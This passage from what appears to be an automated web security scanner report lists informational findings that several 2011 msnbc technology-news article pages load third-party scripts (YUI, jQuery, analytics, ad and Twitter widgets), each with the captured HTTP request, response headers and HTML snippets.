<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/3184fbf3a1cea536a06ab9ecdadcc3b45c540e59.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d96c8b3032770da5152df3c93298ef8d7e4320a.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.310. http://technolog.msnbc.redacted/_news/2010/08/23/4954400-apple-would-use-voice-facial-recognition-as-part-of-iphone-kill-switch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2010/08/23/4954400-apple-would-use-voice-facial-recognition-as-part-of-iphone-kill-switch

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2010/08/23/4954400-apple-would-use-voice-facial-recognition-as-part-of-iphone-kill-switch HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=16
Date: Sun, 30 Jan 2011 02:24:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 157985

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - Apple would u
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/2bec8693ba2bbf1b5e59fba85e1eaa8e41e25f54.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/c35b2b2ba0e917395006637b1d563433bdaa5966.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.311. http://technolog.msnbc.redacted/_news/2010/08/24/4961720-yahoo-search-results-are-now-coming-from-bing-

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2010/08/24/4961720-yahoo-search-results-are-now-coming-from-bing-

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2010/08/24/4961720-yahoo-search-results-are-now-coming-from-bing- HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=17
Date: Sun, 30 Jan 2011 02:24:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56906

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - Yahoo search
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/e89cb27add8a8bec4ff014077d76236c84e0ee2e.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.312. http://technolog.msnbc.redacted/_news/2010/08/26/4975799-big-facebook-sues-little-teachbook

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2010/08/26/4975799-big-facebook-sues-little-teachbook

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2010/08/26/4975799-big-facebook-sues-little-teachbook HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=95
Date: Sun, 30 Jan 2011 02:23:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 97540

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - Big Facebook
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/2bec8693ba2bbf1b5e59fba85e1eaa8e41e25f54.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/c35b2b2ba0e917395006637b1d563433bdaa5966.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.313. http://technolog.msnbc.redacted/_news/2010/08/26/4977002-gmail-calling-takes-off-but-not-without-bumps

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2010/08/26/4977002-gmail-calling-takes-off-but-not-without-bumps

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2010/08/26/4977002-gmail-calling-takes-off-but-not-without-bumps HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=137
Date: Sun, 30 Jan 2011 02:22:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65008

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - Gmail calling
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/e89cb27add8a8bec4ff014077d76236c84e0ee2e.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.314. http://technolog.msnbc.redacted/_news/2010/08/27/4982716-older-adults-are-flocking-to-social-networks

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2010/08/27/4982716-older-adults-are-flocking-to-social-networks

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2010/08/27/4982716-older-adults-are-flocking-to-social-networks HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=171
Date: Sun, 30 Jan 2011 02:21:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 68461

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - Older adults
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/e89cb27add8a8bec4ff014077d76236c84e0ee2e.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.315. http://technolog.msnbc.redacted/_news/2010/08/30/5001169-google-may-start-pay-per-view-movies-on-youtube

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2010/08/30/5001169-google-may-start-pay-per-view-movies-on-youtube

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2010/08/30/5001169-google-may-start-pay-per-view-movies-on-youtube HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=191
Date: Sun, 30 Jan 2011 02:21:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58489

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - Google may st
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
